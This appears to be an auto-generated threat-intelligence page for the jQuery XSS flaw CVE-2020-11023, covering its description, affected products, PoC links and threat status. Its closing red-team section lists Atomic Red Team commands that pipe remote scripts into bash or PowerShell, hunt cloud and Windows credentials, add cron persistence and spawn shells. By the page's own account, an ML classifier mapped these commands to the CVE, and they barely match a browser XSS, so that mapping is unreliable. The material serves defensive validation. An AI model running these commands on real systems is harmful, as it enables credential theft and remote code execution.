CVE-2020-11023
Overview
This vulnerability is a cross-site scripting (XSS) flaw caused by improper handling of HTML containing <option> elements within jQuery's DOM manipulation methods such as .html() and .append(). The root cause lies in jQuery's failure to correctly sanitize or neutralize executable code embedded in untrusted HTML input, specifically when processing <option> tags. The affected component is the jQuery DOM manipulation API in versions from 1.0.3 up to but not including 3.5.0.
Vulnerability Description
In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.
Impact
An attacker can execute arbitrary JavaScript in the context of the affected web application by supplying crafted HTML input to vulnerable jQuery DOM manipulation methods. This requires the ability to influence or provide HTML content to these functions, which may occur via user input or third-party data sources. Successful exploitation can lead to session hijacking, unauthorized actions on behalf of users, or data theft, impacting confidentiality and integrity of user sessions and application data.
Solution
Upgrade jQuery to version 3.5.0 or later, where this vulnerability is patched as documented in the official jQuery upgrade guide (https://jquery.com/upgrade-guide/3.5/). Debian security advisory DSA-4693 and Fedora package announcements provide patched package versions for their distributions. Refer to these advisories for detailed patch instructions: https://www.debian.org/security/2020/dsa-4693 and https://lists.fedoraproject.org/archives/list/[email protected]/message/QPN2L2XVQGUA2V5HNQJWHK3APSK3VN7K/. Vendors including Oracle and NetApp also reference this fix in their security alerts.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from the improper handling of HTML content containing `<option>` elements in certain versions of jQuery. Specifically, the issue lies in the way jQuery's DOM manipulation methods, such as `.html()` and `.append()`, process untrusted HTML input. Even when this input is sanitized, it can still lead to the execution of untrusted code. This flaw is particularly concerning because it allows attackers to inject malicious scripts into web applications that utilize affected versions of jQuery, potentially leading to cross-site scripting (XSS) attacks. The vulnerability affects jQuery versions from 1.0.3 to 3.4.9, necessitating an upgrade to version 3.5.0 or later to mitigate the risk.
Attack vectors for exploiting this vulnerability are varied and can be executed through multiple channels. An attacker could craft a malicious payload that includes untrusted HTML, which is then passed to a vulnerable jQuery method. This could occur in scenarios where user input is not adequately validated or sanitized before being processed by the application. For instance, if a web application allows users to submit data that is later rendered on a webpage without proper checks, an attacker could exploit this to execute arbitrary JavaScript code in the context of the victim's browser. This could lead to session hijacking, data theft, or even complete takeover of user accounts, depending on the privileges of the affected users.
The real-world implications of this vulnerability are significant, particularly for businesses that rely on web applications for customer interaction and data management. The potential for data breaches and unauthorized access to sensitive information can result in severe financial losses, reputational damage, and legal repercussions. Organizations that fail to address this vulnerability may find themselves exposed to a range of cyber threats, including phishing attacks and malware distribution. Furthermore, the impact can extend beyond immediate financial costs, as businesses may face regulatory scrutiny and loss of customer trust in the aftermath of a successful exploitation.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. Regularly updating jQuery to the latest stable version is crucial, as it includes patches for known vulnerabilities. Additionally, implementing robust input validation and output encoding practices can significantly reduce the risk of malicious code execution. Web application firewalls (WAFs) can also be employed to monitor and filter out potentially harmful requests before they reach the application layer. Furthermore, conducting regular security assessments and penetration testing can help identify and remediate vulnerabilities before they can be exploited by attackers.
In conclusion, the vulnerability associated with jQuery's handling of untrusted HTML input poses a serious threat to web applications. The potential for exploitation through XSS attacks can lead to significant business risks, including data breaches and reputational harm. Organizations must prioritize the adoption of secure coding practices, timely updates, and comprehensive security measures to safeguard their applications against such vulnerabilities. By taking proactive steps, businesses can effectively mitigate the risks associated with this and similar vulnerabilities, ensuring a more secure online environment for their users.
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2020-11023, highlighted by the emergence of multiple new proof-of-concept exploits publicly available on GitHub and the publication of a dedicated ExploitDB entry. This increased visibility and accessibility of exploit code have coincided with the vulnerability’s addition to the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring its growing operational relevance. Our telemetry indicates a sharp uptick in detection events linked to this vulnerability, signaling that threat actors are actively integrating these exploits into their toolsets. The elevation of the CVSS score to 6.1 and the appearance of a significant EPSS score further reflect an increased likelihood of successful exploitation in the wild. For defenders, this evolution means that CVE-2020-11023 has transitioned from a theoretical risk to a tangible threat with demonstrated exploitability, necessitating heightened vigilance. The expanded exploit landscape lowers the barrier for adversaries to weaponize this vulnerability, potentially increasing the frequency and impact of attacks against vulnerable jQuery implementations. Consequently, the overall threat level associated with CVE-2020-11023 has escalated from moderate concern to a more pressing security issue within web application environments.
Update 2 — May 20, 2026
Recent updates to CVE-2020-11023 reveal a recalibration of its severity rating, with the CVSS score increasing from 6.1 to 6.9, reflecting a more accurate assessment of the vulnerability’s potential impact. Concurrently, the Exploit Prediction Scoring System (EPSS) score has risen by over 20%, indicating a heightened likelihood of exploitation despite a notable reduction in detection activity observed across our telemetry. This divergence suggests that while active exploitation attempts may have temporarily declined, the underlying risk remains elevated due to the availability of multiple new proof-of-concept exploits circulating in public repositories. The inclusion of this vulnerability in the KEV catalog underscores its broader relevance across diverse software ecosystems that incorporate vulnerable jQuery versions, potentially amplifying its attack surface. For defenders, this shift signifies an increased urgency to monitor for exploitation attempts and reassess exposure, as adversaries may leverage the growing body of exploit tools to bypass existing safeguards. Overall, these developments elevate the threat level of CVE-2020-11023 from moderate to a more pronounced concern, warranting sustained attention within web application security operations.
Affected Products (81)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Jquery | Jquery | All |
cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 9.0 |
cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 31 |
cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 32 |
cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 33 |
cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*
|
|
|
Drupal | Drupal | All |
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
|
|
|
Drupal | Drupal | All |
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
|
|
|
Drupal | Drupal | All |
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
|
|
|
Oracle | Application Express | All |
cpe:2.3:a:oracle:application_express:*:*:*:*:*:*:*:*
|
|
|
Oracle | Application Testing Suite | 13.3.0.1 |
cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*
|
|
|
Oracle | Banking Enterprise Collections | All |
cpe:2.3:a:oracle:banking_enterprise_collections:*:*:*:*:*:*:*:*
|
|
|
Oracle | Banking Platform | All |
cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*
|
|
|
Oracle | Blockchain Platform | All |
cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:*
|
|
|
Oracle | Blockchain Platform | 21.1.2 |
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
|
|
Oracle | Business Intelligence | 5.9.0.0.0 |
cpe:2.3:a:oracle:business_intelligence:5.9.0.0.0:*:*:*:enterprise:*:*:*
|
|
|
Oracle | Communications Analytics | 12.1.1 |
cpe:2.3:a:oracle:communications_analytics:12.1.1:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Eagle Application Processor | All |
cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Element Manager | 8.1.1 |
cpe:2.3:a:oracle:communications_element_manager:8.1.1:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Element Manager | 8.2.0 |
cpe:2.3:a:oracle:communications_element_manager:8.2.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Element Manager | 8.2.1 |
cpe:2.3:a:oracle:communications_element_manager:8.2.1:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| jQuery 1.0.3 - Cross-Site Scripting (XSS) | Central InfoSec | webapps | multiple | - | View |
GitHub PoCs (6)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
honeyb33z/cve-2020-11023-scanner
|
honeyb33z | 3 | 1 | 2025-01-30 | View |
|
Cybernegro/CVE-2020-11023
CVE-2020-11023 PoC for bug bounty.
|
Cybernegro | 3 | 0 | 2024-01-03 | View |
|
GarlicB/jquery35-local-agent
Offline jQuery CVE-2020-11023 remediation kit for legacy Spring/JSP - Node.js built-ins only (no npm, no internet)
|
GarlicB | 1 | 0 | 2026-07-05 | View |
|
Snorlyd/https-nj.gov---CVE-2020-11023
Vulnearability Report of the New Jersey official site
|
Snorlyd | 1 | 0 | 2022-05-23 | View |
|
towaos/towaos-lab-cve-2020-11023
|
towaos | 0 | 0 | 2025-12-02 | View |
|
andreassundstrom/cve-2020-11023-demonstration
Demonstration of CVE-2020-11023
|
andreassundstrom | 0 | 0 | 2024-04-13 | View |
Threat Feed
7 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.